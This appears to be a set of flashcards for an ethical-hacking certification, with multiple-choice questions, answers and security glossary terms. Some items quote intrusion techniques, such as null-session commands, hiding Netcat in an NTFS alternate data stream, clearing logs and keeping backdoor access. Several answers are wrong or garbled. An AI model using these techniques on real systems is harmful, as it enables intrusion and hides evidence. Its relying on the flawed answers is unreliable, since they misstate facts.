Who are the individuals who perform legal security tests while sometimes performing questionable activities? a. Gray hat hackers b. Ethical hackers c. Crackers d. White hat hackers
A. Gray hat hackers are individuals who cross the line between ethical and unethical behavior.
During a security review, you have discovered that there are no documented security policies for the area you are assessing. Which of the following would be the most appropriate course of action? a. Identify and evaluate current practices b. Create policies while testing c. Increase the level of testing d. Stop the audit
A. If no current practices or procedures exist, you should evaluate what type of security practices are actually in place so that you can recommend the correct changes.
Which of the following best describes an attack that altered the contents of two critical files? a. Integrity b. Confidentially c. Availability d. Authentication
A. Integrity provides for the correctness of information. Integrity allows users of information to have confidence in its correctness. Integrity can apply to paper documents as well as electronic ones.
Which of the following is a filtering technique used to drop packets at the routing level, typically done dynamically to respond quickly to DDoS attacks? a. Black hole filtering b. Activity profiling c. Throttling d. Bogon filtering
A. Only black hole filtering can dynamically drop packets at the routing level. Answers B, C, and D are incorrect because, although each can be used to address DoS attacks, they can't dynamically drop packets at the routing level.
Which of the following uses the faster time-memory trade-off technique and works by precomputing all possible passwords in advance? a. Rainbow tables b. Dictionary cracks c. Hybrid cracks d. Brute-force crack
A. Rainbow tables use the faster time-memory trade-off technique and work by precomputing all possible passwords in advance.
Which of the following sets all TCP flags to zeros? a. nmap -sn 192.168.1.1/ 24 b. nmap -null 192.168.1.1/ 24 c. nmap -sX 192.168.1.1/ 24 d. nmap -sI 192.168.1.1/ 24
A. Running an -sn scan sets all the TCP flags to off (0).
Which of the following is a vulnerability in the Bash shell that was discovered in 2014 and thereafter exploited to launch a range of attacks against Linux and UNIX systems? a. Shellshock b. Heartbleed c. Bashshell d. Poodle
A. Shellshock is a collection of security bugs in the widely used UNIX Bash shell.
Which of the following protocols uses UDP port 514? a. Syslog b. NetBIOS c. Finger d. LDAP
A. Syslog is used for network devices to send event messages to a logging server known as a syslog server. The syslog protocol is supported by a wide range of devices and can be used to log different types of events.
What is the purpose of the following Nmap scan? Nmap -sn 192.168.123.1-254 a. Ping only on the targets, no port scan b. A NULL TCP scan c. A TCP port scan d. Port scan all targets
A. The -sn option tells Nmap not to do a port scan after host discovery and only print out the available hosts that responded to the host discovery probes. This is often known as a "ping scan," but you can also request that traceroute and NSE host scripts be run.
You are about to target a Linux server and would like to attempt access to the passwords. Which of the following folders is where you would find them? a. /etc b. /sbin c. /ect d. /var
A. The /etc folder is the location of many important files in Linux. Two of those files are the passwd and shadow files.
Your ethical hacking firm has been hired to conduct a penetration test. Which of the following documents limits what you can discuss publicly? a. Nondisclosure agreement b. PCI-DSS c. Memorandum of understanding d. Terms of engagement
A. The NDA sets limits on what can or cannot be discussed with others.
You have started a pen test and are starting to resolve domain names. Which of the following is the correct syntax to look for IP addresses? a. host -t a hackthestack.com b. host -t AXFR hackthestack.com c. host -t ns hackthestack.com d. host -t soa hackthestack.com
A. The correct syntax to find a domain name is -t a.
You are trying to establish a null session to a target system. Which is the correct syntax? a. net use \\IP_address\IPC$ "" /u: "" b. net use //IP_address/IPC$ "" \ u: "" c. net use \\IP_address\IPC$ * /u: "" d. net use \\IP_address\IPC$ * \ u: ""
A. The proper syntax is net use \\IP_address\IPC$ "" /u:""
You are trying to establish a null session to a target system. Which is the correct syntax? a. net use \\ IP_address\ IPC$ "" /u:"" b. net use //IP_address/IPC$ "" \ u:"" c. net use \\ IP_address\ IPC$ * /u:"" d. net use \\ IP_address\ IPC$ * \ u:""
A. The proper syntax is net use \\IP_address\IPC$ "" /u:"".
Which DDoS tool uses TCP port 6667? a. Trinity b. Trinoo c. Shaft d. DDoSPing
A. Trinity uses TCP port 6667. Trinoo and Shaft do not use port 6667, and DDoSPing is a scanning tool; therefore, answers B, C, and D are incorrect.
What are the two ICMP codes used when performing a ping? a. Type 0 and 8 b. Type 0 and 3 c. Type 3 and 5 d. Type 5 and 11
A. Type 0 is a ping reply and type 8 is a ping request. Make sure you know the range of ICMP types for the exam.
Which covert communication program has the capability to bypass router ACLs that block incoming SYN traffic on port 80?
ACKCMD
Which of the following is an example of a covert communication tool?
ACKCMD
Principal of least privilege
Act of giving an entity the least amount of access to perform its job and nothing more
Which of the following is not a valid virus type of infection?
Add-on shell
Trusted computer base (TCB)
All the protection mechanisms within a computer system. This includes hardware, firmware, and software that are responsible for enforcing a security policy.
Spam
Also known as spamming. The use of any electronic communication's medium to send unsolicited messages in bulk. Spamming is a major irritation of the Internet era.
Trusted network interpretation (TNI)
Also known as the Red Book. A document that is part of the Rainbow Series.
Rogue access point
An 802.11 access point that has been set up by an attacker for the purpose of diverting legitimate users so that their traffic can be sniffed or manipulated.
Access control list (ACL)
An ACL is a table or list stored by a router to control access to and from a network by helping the device determine whether to forward or drop packets that are entering or exiting it.
Extended binary coded decimal interchange code (EBCDIC)
An IBM-developed 8-bit binary code that can represent 256 characters. It allows control codes and graphics to be represented in a logical format. EBCDIC was created to represent data in particular types of data processing and communications terminal devices.
Heuristic filter
An IDS/IPS and antispam filter technology that uses criteria based on a centralized rule database.
IPsec
An IETD standard used to secure TCP/IP traffic. It can be implemented to provide integrity and confidentiality
IPSec
An IETF standard used to secure TCP/IP traffic. It can be implemented to provide integrity and confidentiality.
Function point analysis (FPA)
An ISO-approved method as a standard to estimate the complexity of software.
Phreaker
An Individual who hacks phone systems or phone-related equipment. Phreakers predate computer hackers.
Honeypot
An Internet-attached server that acts as a decoy, luring in potential hackers in order to study their activities and monitor how they are able to break in to a system.
vulnerability
An absence or a weakness of a countermeasure that is in place.
Discretionary access control (DAC)
An access policy that allows the resource owner to determine access.
CobiT
An acronym for Control Objectives for Information and Related Technology. CobiT is a framework that was designed by SACA to aid in information security best practices.
active fingerprinting
An active method of identifying the operating system (OS) of a targeted computer or device that involves injecting traffic into the network.
Active fingerprint
An active method of identifying the operating system of a targeted computer or device that involves injecting traffic into the network.
Stateful inspection
An advanced firewall architecture that works at the network layer and can keep track of packet activity. Unlike static packet filtering, which examines a packet based on the information in its header, stateful inspection tracks each connection traversing all interfaces of the firewall and makes sure they are valid. One example is a DNS reply that has just been received actually in response to a DNS request.
Confidentiality agreement
An agreement that employees, contractors, or third-party users must read and sign prior to being granted access rights and privileges to the organization's IT infrastructure and its assets.
Warm site
An alternative computer facility that is partially configured and can be made ready in a few days.
Buffer
An amount of memory reserved for the temporary storage of data.
Qualitative assessment
An analysis of risk that places the probability results into terms such as none, low, medium, and high.
Simple network management protocol (SNMP)
An application layer protocol that facilitates the exchange of management information between network devices. Version one uses well-known community strings of public and private.
vulnerability assessment
An assessment method whereby an organization's network is tested for countermeasure absences or other security weaknesses.
Identify theft
An attack in which an individual's personal, confidential, banking, and financial identify is stolen and compromised by another individual or individuals. Use of your Social Security number without your consent or permission could result in identify theft.
Exploit
An attack on a computer system especially one that takes advantage of a particular vulnerability that the system offers to intruders
Impact
An attempt to identify the extent of the consequences should a given event occur.
Digital signature
An electronic signature that can be used to authenticate the identity of the sender of a message. A digital signature is usually created by encrypting the user's private key and is decrypted with the corresponding public key.
Extensible markup language (XML)
An emerging standard or system for defining, validating, or sharing document formats and data distributed on the Web. XML enables authors to create customized tags that can help them efficiently achieve their goals.
One-time pad
An encryption mechanism that can be used only once and that is, theoretically, unbreakable. One-time pads function by combining plain text with a random pad that is the same length as the plain text.
Block cipher
An encryption scheme in which the data is divided into fixed-size blocks, each of which is encrypted independently of the others.
Public key encryption
An encryption scheme that uses two keys. In an email transaction, the public key encrypts the data and a corresponding private key decrypts the data. Because the private key is never transmitted or publicized, the encryption scheme is extremely secure. For digital signatures, the process is reversed: The sender uses the private key to create the digital signature, which anyone who has access to the corresponding public key can read.
Symmetric encryption
An encryption standard that requires all parties to have a copy of a shared key. A single key is used for both encryption and decryption.
Registration authority (RA)
An entity responsible for the identification and authentication of the PKI certificate. The RA is not responsible for signing or issuing certificates. The most common for of certificate is the X.509 standard.
Software bug or software flaw
An error in software coding or its design that can result in software vulnerability.
Assessment
An evaluation and/or valuation of IT assets based on predefined measurement or evaluation criteria. This does not typically require an accounting or auditing firm to conduct an assessment such as a risk or vulnerability assessment.
Expert system
An expert system is a class of computer programs developed by researchers in artificial intelligence during the 1970s and applied commercially throughout the 1980s. In essence, they are programs made up of a set of rules that analyze information (usually supplied by the user of the system) about a specific class of problems, as well as provide analysis of the Expert system problem(s), and, depending on their design, a recommended course of user action to implement corrections.
Materiality
An expression of the relative significance or importance of a particular matter in the context of the organization as a whole.
log review
An important practice to ensure that issues are detected before they become major problems. Computer security logs are particularly important because they can help an organization identify security incidents, policy violations, and fraud.
Ad-hoc mode
An individual computer in ad-hoc operation mode can communicate directly to other client units. No access point is required. Ad-hoc operation is ideal for small networks of no more than 2-4 computers.
CVSS (Common Vulnerability Scoring System)
An industry standard that was created by security practitioners in the Forum of Incident Response and Security Teams (FIRST) to provide the principal characteristics of a vulnerability and produce a numerical score reflecting its severity.
Risk acceptance
An informed decision to suffer the consequences of likely events.
Database-management system (DBMS)
An integrated set of computer programs that provide the capabilities needed to establish, modify, make available, and maintain the integrity of a database.
Internet
An interconnected system of networks that connects computers around the world via the TCP/IP protocol.
Compensating control
An internal control designed to reduce risk or weakness in an existing control.
Bluetooth
An open standard for short-range wireless communications of data and voice between both mobile and stationary devices. Used in cell phones, PDA, laptops, and other devices.
Internet assigned numbers authority (IANA)
An organization dedicated to preserving the central coordinating functions of the global Internet for the public good. Used by hackers and security specialists to track down domain owners and their contact details.
Computer incident response team (CIRT)
An organization developed to provide incident response services to victims of attacks, publish alerts concerning vulnerabilities and threats, and offer other information to help improve organizations ability to respond to computer and network security issues.
Network operations center (NOC)
An organization's help desk or interface to its end users where trouble calls, questions, and trouble tickets are generated.
Covert channel
An unintended communication path that allows a process to transfer information in such a way that violates a system's security policy.
covert channel
An unintended communication path that enables a process to transfer information in a way that violates a system's security policy.
dynamic testing
Analyzes software security in the runtime environment. With this testing, the tester should not have access to the application's source code.
static testing
Analyzes software security without actually running the software. This is usually provided by reviewing the source code or compiled application.
Threat
Any agent, condition, or circumstance that could potentially cause harm, loss, damage, or compromise to an IT asset or data asset.
Threat
Any agent, condition, or circumstances that could potentially cause harm, loss, damage or compromise to an IT asset or data asset
Queue
Any group of items, such as computer jobs or messages, waiting for service.
Spyware
Any software application that covertly gathers information about a user's Internet usage and activity and then exploits this information by sending adware and pop-up ads similar in nature to the user's Internet usage history.
spyware
Any software application that covertly gathers information about a user's Internet usage and activity and then exploits this information by sending adware and pop-up ads similar in nature to the user's Internet usage history.
Data leakage
Any type of computer information loss. This can involve removal of information by CD, floppy, or USB thumb drive, or any other method that allows the removal or leakage of information by stealing computer reports, data, or tapes.
Noise
Any unwanted signal, such as static, that interferes with the clarity of data being transmitted, thus creating the possibility that the receiver will receive a misconstrued message.
Asset
Anything of value owned or possessed by an individual or business
Asset
Anything of value owned or possessed by an individual or business.
Encapsulation (objects)
As used by layered protocols, a technique that applies to a layer adding header information to the protocol data unit (PDU) from the layer above. Basically, this refers to the capability to cover and seal an object.
In which layer of the OSI model could ARP poisoning occur? a. Network b. Data link c. Session d. Transport
B. ARP poisoning occurs at the data link layer.
Which covert communication program has the capability to bypass router ACLs that block incoming SYN traffic on port 80? a. Loki b. AckCmd c. Stealth Tools d. Firekiller 2000
B. AckCmd uses TCP ACK packets to bypass ACL rules on firewalls. Answer A, B, and C are incorrect because Loki is an ICMP tool, Stealth Tools is a malware wrapper, and Firekiller disables antivirus.
You found the following command on a compromised system: Type nc.exe > readme.txt:nc.exe What is its purpose? a. This command is used to start a Netcat listener on the victim system. b. This command is used to stream Netcat behind readme.txt. c. This command is used to open a command shell on the victim system with Netcat. d. This command is used to unstream Netcat.exe.
B. Alternate data streams are another type of named data stream that can be present within each file. The command streams Netcat behind readme.txt on an NTFS drive.
Which of the following types of biometric systems is considered the most accurate? a. Fingerprint scanning b. Iris scanning c. Voice scanning d. Palm scanning
B. Biometric systems are not all equal when it comes to accuracy. Iris-scanning biometric systems are considered the most accurate.
Which of the following addresses the secrecy and privacy of information? a. Integrity b. Confidentiality c. Availability d. Authentication
B. Confidentiality addresses the secrecy and privacy of information. Physical examples of confidentiality include locked doors, armed guards, and fences. Logical examples of confidentiality include passwords, encryption, and firewalls.
Which type of attack sends fake entries to a DNS server to corrupt the information stored there? a. DNS DoS b. DNS cache poisoning c. DNS pharming d. DNS zone transfer
B. DNS cache poisoning is a technique that tricks your DNS server into believing it has received authentic information when in reality, it has been deceived.
Which of the following tools can be used to clear the Windows logs? a. Auditpol b. ELSave c. PWdump d. Cain and Abel
B. ELSave is used to clear the log files. Other tools used to remove evidence and clear logs include Winzapper and Evidence Eliminator.
Which of the following tools can be used to clear the Windows logs? a. Auditpol b. ELSave c. PWdump d. Cain and Abel
B. ELSave is used to clear the log files. Other tools used to remove evidence and clear logs include Winzapper and Evidence Eliminator.
During the early stages of a pen test you have attempted to map out the route to a network with Linux traceroute and have not been successful because it seems ICMP is blocked. Which of the following would be a good tool for you to use to attempt to gather additional information? a. Tracert b. Hping c. Ping d. A port scanner
B. Hping can perform traceroute as well as a variety of other mapping functions.
You have captured some packets from a system you would like to passively fingerprint. You noticed that the IP header length is 20 bytes and there is a datagram length of 84 bytes. What do you believe the system to be? a. Windows XP b. Linux c. Windows 7 d. Windows 8
B. Linux. Active fingerprinting works by examining the unique characteristics of each OS. One difference between competing platforms is the datagram length. On a Linux computer, this value is usually 84, whereas Microsoft computers default to 60. Therefore, answers A, C, and D are incorrect because they are all Windows operating systems.
Which of the following is not an example of Martian packets? a. 10.0.0.0 b. 126.0.0.0 c. 224.0.0.0 d. 172.16.0.0
B. Martian packets are packets with unroutable addresses, such as unused IP addresses, loopback addresses, and NAT'd addresses. 126.0.0.0 is a valid address. Answers A, C, and D are incorrect because these are all addresses that are unroutable.
During a pen test, you have successfully gained access to a system. You are able to gain local administrator status on one workstation and have now moved to local administrator on a second workstation. With this in mind, which of the following is true? a. You have no access. b. You have completed horizontal privilege escalation. c. You will have a RID of 501. d. You have completed vertical privilege escalation.
B. Moving from one local admin account to another local admin account would be an example of horizontal privilege escalation
During a pen test, you have successfully gained access to a system. You are able to gain local administrator status on one workstation and have now moved to the local administrator on a second workstation. With this in mind, which of the following is true? a. You have no access. b. You have completed horizontal privilege escalation. c. You will have a RID of 501. d. You have completed vertical privilege escalation.
B. Moving from one local admin account to another local admin account would be an example of horizontal privilege escalation.
Which of the following best describes Netcat? a. Netcat is a more powerful version of Snort and can be used for network monitoring and data acquisition. This program enables you to dump the traffic on a network. It can also be used to print out the headers of packets on a network interface that matches a given expression. b. Netcat is called the TCP/IP Swiss army knife. It works with Windows and Linux and can read and write data across network connections using TCP or UDP. c. Netcat is called the TCP/IP Swiss army knife. It is a simple Windows-only utility that reads and writes data across network connections using TCP or UDP. d. Netcat is called the TCP/IP Swiss army knife. It is a simple Linux-only utility that reads and writes data across network connections using TCP or UDP.
B. Netcat is considered the Swiss army knife of hacking tools because it will do so many different things, such a shovel a shell, port scan, banner grabbing, and file transfer. It works with Windows and Linux.
After two days of work, you successfully exploited a traversal vulnerability and gained root access to a CentOS 6.5 server. Which of the following is the best option to maintain access? a. Install spyware b. Install Netcat c. Disable IPchains d. Add your IP addresses to /etc/hosts
B. Netcat is known for its many uses, such as file transfer and banner grabbing. Netcat can be used to maintain access because it supports the capability to redirect the input and output of a shell to a service so that it can be remotely accessed.
Which of the following is the most important step for the ethical hacker to perform during the pre-assessment? a. Hack the web server. b. Obtain written permission to hack. c. Gather information about the target. d. Obtain permission to hack.
B. Obtain written permission to hack. Ethical hackers must always obtain legal, written permission before beginning any security tests
ICMP is a valuable tool for troubleshooting and reconnaissance. What is the correct type for a ping request and a ping response? a. Ping request type 5, ping reply type 3 b. Ping request type 8, ping reply type 0 c. Ping request type 3, ping reply type 5 d. Ping request type 0, ping reply type 8
B. Ping is the most common ICMP type. A ping request is a type 8, and a ping reply is a type 0.
You have gone to an organization's website to gather information, such as employee names, email addresses, and phone numbers. Which step of the hacker's methodology does this correspond to? a. Scanning and enumeration b. Reconnaissance c. Fingerprinting d. Gaining access
B. Reconnaissance includes the act of reviewing an organization's website to gather as much information as possible.
One of the members of your security assessment team is trying to find out more information about a client's website. The Brazilian-based site has a .com extension. She has decided to use some online Whois tools and look in one of the Regional Internet Registries. Which of the following represents the logical starting point? a. AfriNIC b. ARIN c. APNIC d. RIPE
B. Regional Internet Registries (RIR) maintain records from the areas from which they govern. ARIN is responsible for domains served within North and South America, and therefore, is the logical starting point for that .com domain.
You're starting a port scan of a new network. Which of the following can be used to scan all ports on the 192.168.123.1 network? a. nmap -p 1,65536 192.168.123.1 b. nmap -p- 192.168.123.1 c. nmap 192.168.123.1 -ports { {#}} 8220; all { {#}} 8221; d. nmap -p 0-65536 192.168.123.1
B. Running -p- scans all 65,535 ports on the targeted systems.
Which of following port-scanning techniques can be used to map out the firewall rules on a router? a. NULL scan b. ACK scan c. Inverse flag scan d. Firewalk
B. Running an ACK scan attempts to determine access control list (ACL) rule sets or identify whether firewall inspection or simply stateless inspection is being used. A stateful firewall should return no response. If an ICMP destination is unreachable or a communication administratively prohibited message is returned, the port is considered to be filtered. If an RST is returned, no firewall is present.
You have been assigned a junior pen tester during a pen test. You performed the following scan: nmap -sL www.example.com Starting Nmap 6.25 ( http:// nmap.org ) at 2016-10-12 18: 46 Central Daylight Time Host 93.184.216.34 not scanned Your partner asks you to explain the results. Which of the following best describes the correct answer? a. The system was offline. b. The technique only checks DNS and does not scan. c. The syntax is incorrect. d. ICMP is blocked, so no scan is performed.
B. Running the -sL switch checks DNS for a list of IP addresses but does not scan the IP addresses. This technique provides a list of valid IP addresses to scan.
When would an attacker want to begin a session hijacking attack if session fixation is being used? a. At the point that the three-step handshake completes b. Before authentication c. After authentication d. Right before the four-step shutdown
B. Session fixation is an attack that permits an attacker to take control of a valid user session. The attacker must trick the victim into authenticating with a fixed session ID that is given to the victim before he or she authenticates. Answers A, C, and D are incorrect because all three are after authentication and not before.
Setting which IP option enables hackers to specify the path an IP packet would take? a. Routing b. Source routing c. RIP routing d. Traceroute
B. Source routing was designed to enable individuals to specify the route that a packet should take through a network or to allow users to bypass network problems or congestion.
You have gained access to a system. You would now like to hide a file that will be hidden and streamed behind another. Which of the following file systems is required? a. CDFS b. NTFS c. FAT d. FAT32
B. Streams allow files to contain more than one stream of data. In the Windows OS when the NTFS file system is being used, this default data stream is called an alternate data stream, and it allows one file to be hidden behind another.
You would like to perform a scan that runs a script against SSH and attempts to extract the SSH host key. Which of the following is the correct syntax? a. nmap -sC -p21, 111, 139 -T3 www.knowthetrade.com b. nmap -sC -p22, 111, 139 -T4 www.knowthetrade.com c. nmap -sL -p21, 111, 139 -T3 www.knowthetrade.com d. nmap -sI -p22, 111, 139 -T4 www.knowthetrade.com
B. The -sC option runs a script, and the correct port would be 22 because that is the default port that SSH runs on.
As part of a pen test, you have port scanned a Linux system. Listed here is the scan you performed: nmap -sX -vv -P0 192.168.1.123 -p 80. If the system had the specific listening port open, what would be returned? a. RST b. No response c. SYN ACK d. ACK
B. The -sX command means you are running an Xmas tree scan. Per RFC 793, Linux systems will send no response to an open port.
How many steps are in the ARP process? a. 1 b. 2 c. 3 d. 4
B. The ARP process is a two-step process that consists of an ARP request and an ARP reply.
Which DoS attack technique makes use of the Direct Connect protocol? a. ICMP flood b. Peer-to-peer attack c. Application-level attack d. Plashing
B. The only DoS attack that uses the DC protocol are peer-to-peer attacks, which target older versions of the hub software to instruct registered clients to disconnect from the P2P network and connect to a system at the intended target's location.
You have been asked to perform a penetration test for a local company. You have had several meetings with the client and are now almost ready to begin the assessment. Which of the following is the document that would contain verbiage which describes what type of testing is allowed and when you will perform testing and limits your liabilities as a penetration tester? a. Nondisclosure agreement b. Rules of engagement c. Service-level agreement d. Project scope
B. The rules of engagement define what the penetration testing company can or cannot do. It lists the specific actions that are allowable.
What flag or flags are set on the second step of the three-way TCP handshake? a. SYN b. SYN ACK c. ACK d. ACK PSH
B. The second step of the three-step handshake sets the SYN ACK flags.
Open source
Based on the GNU General Public License. Software that is open source is released under an open source license or to the public domain. The source code can be seen and can be modified.
Which of the following is a filtering technique used to drop packets at the routing level, typically done dynamically to respond quickly to DDoS attacks?
Black hole filtering
Symmetric algorithm
Both parties use the same cryptographic key.
System testing
Bringing together all the programs that a system comprises, for testing purposes. Programs are typically integrated in a top-down, incremental fashion.
How can the SMTP vrfy and expn commands help an attacker gain access to a Linux or UNIX system?
By confirming username guesses
This type of security test might seek to target the CEO's laptop or the organization's backup tapes to extract critical information, usernames, and passwords. a. Insider attack b. Physical entry c. Stolen equipment d. Outsider attack
C. A stolen equipment test is performed to determine what type of information might be found. The equipment could be the CEO's laptop or the organization's backup media.
You have discovered that several of your team members' computers were infected. The attack was successful because the attacker guessed or observed which websites the victims visited and infected one or more of those sites with malware. Which type of attack was executed? a. Spear phishing attack b. Phishing attack c. Watering hole attack d. SMiShing attack
C. A watering hole attack can be described as a means to trick a victim into visiting a website that is infected. The website would be one that the attacker knows the victim visits on a regular basis.
Which of the following techniques requires an attacker to listen to the conversation between the victim and server and capture the authentication token for later reuse? a. XSS b. Man in the browser c. Session replay d. CSRF
C. Authentication should be unique for each time that it occurs. If not, the credentials used to log in could be captured and replayed. This describes a session replay attack. Answer A is incorrect because cross-site scripting (XSS) works by enticing users to click a link with a script embedded. Answer B is incorrect because a man-in-the-browser attack is a Trojan. Answer D is incorrect because cross-site request forgery (CSRF) exploits the fact that a user is logged in to a legitimate site and a malicious site at the same time.
Clark is a talented coder and as such has found a vulnerability in a well-known application. Unconcerned about the ethics of the situation, he has developed an exploit that can leverage this unknown vulnerability. Based on this information, which of the following is most correct? a. Clark is a suicide hacker. b. Clark has violated U.S. Code Section 1027. c. Clark has developed a zero day. d. Clark is a white hat hacker.
C. Creating an exploit for which there is no known patch is known as a zero day.
When referring to the domain name service, what is a zone? a. A collection of domains b. The zone namespace c. A collection of resource records d. A collection of alias records
C. Each zone is a collection of structured resource records.
Your company performs PCI-DSS audits and penetration testing for third-party clients. During an approved pen test you have discovered a folder on an employee's computer that appears to have hundreds of credit card numbers and other forms of personally identifiable information (PII). Which of the following is the best course of action? a. Contact the employee and ask why they have the data. b. Make a copy of the data and store it on your local machine. c. Stop the pen test immediately and contact management. d. Continue the pen test and include this information in your report.
C. Finding any kind of PII on an employee's computer, such as credit card numbers and Social Security numbers, is a serious issue and should be dealt with before continuing the penetration test or audit.
You have just started using traceroute and were told that it can use ICMP time exceeded messages to determine the route a packet takes. Which of the following ICMP type codes maps to time exceeded? a. Type 3 b. Type 5 c. Type 11 d. Type 13
C. ICMP type 11 is the correct code for time exceeded.
What is one of the disadvantages of using John the Ripper? a. It cannot crack NTLM passwords. b. It separates the passwords into two separate halves. c. It cannot differentiate between uppercase and lowercase passwords. d. It cannot perform brute-force cracks.
C. John the Ripper cannot differentiate between uppercase and lowercase passwords.
Which form of sniffing is characterized by a large number of packets with bogus MAC addresses? a. Active sniffing b. ARP poisoning c. MAC flooding d. Passive sniffing
C. MAC flooding is the act of attempting to overload the switches content-addressable memory (CAM) table. By sending a large stream of packets with random addresses, the CAM table of the switch will evenly fill up and the switch can hold no more entries; some switches might divert to a "fail open" state.
When discussing Windows authentication, which of the following is considered the weakest? a. NTLMv1 b. NTLMv2 c. LM d. Kerberos
C. Microsoft Windows computers have used different methods to store user passwords over the years. The oldest and least secure method uses LM passwords. These passwords are a maximum of 14 characters and store the password in two 7-character fields.
Which of the following is considered the weakest? a. NTLMv1 b. NTLMv2 c. LM d. Kerberos
C. Microsoft Windows computers have used different methods to store user passwords over the years. The oldest and least secure method uses LM passwords. These passwords are a maximum of 14 characters and store the password in two 7-character fields.
SNMP is a protocol used to query hosts and other network devices about their network status. One of its key features is its use of network agents to collect and store management information, such as the number of error packets received by a managed device. Which of the following makes it a great target for hackers? a. It's enabled by all network devices by default. b. It's based on TCP. c. It sends community strings in clear text. d. It is susceptible to sniffing if the community string is known.
C. Most SNMP devices are configured with public and private as the default community strings. These are sent in clear text.
SNMP is a protocol used to query hosts and other network devices about their network status. One of its key features is its use of network agents to collect and store management information, such as the number of error packets received by a managed device. Which of the following makes it a great target for hackers? a. It's enabled by all network devices by default. b. It's based on TCP. c. It sends community strings in clear text. d. It is susceptible to sniffing if the community string is known.
C. Most SNMP devices are configured with public and private as the default community strings. These are sent in clear text.
Which of the following is a proprietary information security standard that requires organizations to follow security best practices and use 12 high-level requirements, aligned across six goals? a. SOX b. FISMA c. PCI-DSS d. Risk Management Framework
C. PCI-DSS is a proprietary information security standard that requires organizations to follow security best practices and use 12 high-level requirements, aligned across 6 goals.
________ are similar to programs such as WinZip, Rar, and Tar in that they compress the file yet are used to hide the true function of malware. a. Compressors b. Wrappers c. Packers d. Crypters
C. Packers are similar to programs such as WinZip, Rar, and Tar in that they compress the file yet are used to hide the true function of malware.
Which of the following protocols is used when an attacker attempts to launch a man-in-the-middle attack by manipulating sequence and acknowledgment numbers? a. ICMP b. UDP c. TCP d. IP
C. TCP uses sequence numbers. Session hijacking is possible because it takes advantage of the fact that these sequence numbers can be predicted. By submitting the correct sequence number at the right time, the attacker can take control of the session.
You are part of a pen testing team that has been asked to assess the risk of an online service. Management is concerned as to what the cost would be if there was an outage and how frequent these outages might be. Your objective is to determine whether there should be additional countermeasures. Given the following variables, which of the following amounts is the resulting annualized loss expectancy (ALE)? Single loss expectancy = $ 2,500 Exposure factor = .9 Annual rate of occurrence = .4 Residual risk = $ 300 a. $ 960 b. $ 120 c. $ 1,000 d. $ 270
C. The ALE is calculated by the following: ALE = SLE × ARO, or $ 2,500 × .4 = $ 1000.
You have captured packets that you believe have had the source address changed to a private address. Which of the following is a private address? a. 176.12.9.3 b. 12.27.3.1 c. 192.168.14.8 d. 127.0.0.1
C. The Internet Assigned Numbers Authority (IANA) has reserved the following three blocks of the IP address space for private networks: Class A network IP address range = 10.0.0.0- 10.255.255.255, Class B network IP address range = 172.31.0.0- 172.31.255.255, and Class C network IP address range = 192.168.255.0- 192.168.255.255.
Why would an attacker scan for port 445? a. To attempt to cause DoS of the NetBIOS SMB service on the victim system b. To scan for file and print sharing on the victim system c. To scan for SMB services and verify that the system is Windows 2000 or greater d. To scan for NetBIOS services and verify that the system is truly a Windows NT server
C. The SMB protocol is used for file sharing in Windows 2000. In 2000 and newer systems, Microsoft added the capability to run SMB directly over TCP port 445.
Why would an attacker scan for port 445? a. To attempt to cause DoS of the NetBIOS SMB service on the victim system b. To scan for file and print sharing on the victim system c. To scan for SMB services and verify that the system is Windows OS d. To scan for NetBIOS services and verify that the system is truly a Windows NT server
C. The SMB protocol is used for file sharing in Windows 2000. In 2000 and newer systems, Microsoft added the capability to run SMB directly over TCP port 445.
You would like to attempt a man-in-the-middle attack to take control of an existing session. What transport layer protocol would allow you to predict a sequence number? a. ICMP b. UDP c. TCP d. STP
C. The only protocol listed that uses sequence numbers is TCP.
You have successfully scanned a system and identified the following port 80 open. What is the next step you should perform? a. Attempt to go to the web page and examine the source code. b. Use FTP to connect to port 80. c. Telnet to the open port and grab the banner. d. Attempt to connect to port 443.
C. The pen tester will typically continue to explore the service that has been identified, which means that an attempt to banner grab would be the next step.
What type of scan is harder to perform because of the lack of response from open services and because packets could be lost due to congestion or from firewall blocked ports? a. Stealth scanning b. ACK scanning c. UDP scanning d. FIN scan
C. UDP scanning is harder to perform because of the lack of response from open services and because packets could be lost due to congestion or a firewall blocking ports.
Which of the following is NOT a characteristic of Common Vulnerabilities and Exposures (CVE)?
CVE defines severity ratings: Low, Medium and High.
Which of the following is an industry standard that is used to provide a score of the risk of a given security vulnerability?
CVSS
Which of the following is NOT a characteristic of the Common Vulnerability Scoring System (CVSS)?
CVSS is a publicly available and free to use list of known vulnerabilities.
Which of the following measures whether or not a public exploit is available?
CVSS temporal group exploit code maturity metric
Dial back
Can be used for personal identification. A procedure established for positively identifying a terminal that is dialing into a computer system. It works by disconnecting the calling terminal and reestablishing the connection by the computer system dialing the telephone number of the calling terminal.
active vulnerability scanner (AVS)
Can take action to block an attack, such as block a dangerous IP address, whereas a passive scanner can only gather information.
Cloning
Cell phone cloning occurs when the hacker copies the electronic serial numbers from one cell phone to another, thereby duplicating the cell phone.
Which activities should be included into vulnerability research? (Check all that apply.)
Checking newly released alerts regarding relevant innovations and product improvements for security system Being informed about new products and technologies in order to find news related to current exploits wrong
Pretexting
Collecting information about a person under false pretenses.
Netcat is an example of which of the following?
Command shell Trojan
Asynchronous transfer mode (ATM)
Communication technology that uses high-bandwidth, low-delay transport technology and multiplexing techniques. Through dedicated media connections, it provides simultaneous transport of voice, video, and data signals more than 50 times faster than current technology. ATM might be used in phone and computer networks of the future.
Input controls
Computer controls designed to provide reasonable assurance that transactions are properly authorized before processed by the computer; that transactions are accurately converted to machine readable form and recorded in the computer; that data files and transactions are not lost, added, duplicated or improperly changed; and that incorrect transactions are rejected, corrected, and, if necessary, resubmitted on a timely basis.
Artificial intelligence
Computer software that can mimic the learning capability of a human, such as reasoning and learning.
Detective controls
Controls that identify and correct undesirable events that have occurred.
Access control
Controls that monitor the flow of information between the subject and object. They ensure that only the operations permitted are performed.
Preventative controls
Controls that reduce risk and are used to prevent undesirable events from happening.
Backup
Copies of programs, databases, other files, and so on are made with the purpose to restore information in case it is lost; for instance, because of a computer failure, a natural disaster, or a virus infection.
Which of the following is not a common tool used for static malware analysis?
CurrPorts
Which of the following is a common framework applied by business management and other personnel to identify potential events that may affect the enterprise, manage the associated risks and opportunities, and provide reasonable assurance that objectives will be achieved? a. NIST SP 800-37 b. Qualitative risk assessment c. PC-DSS d. Risk management framework
D. A risk management framework is a complete framework used to secure the enterprise, identify risk, build controls, and provide reasonable assurance that objectives will be achieved.
Which of the following is not a common tool used for static malware analysis? a. IDA Pro b. BinText c. UPX d. CurrPorts
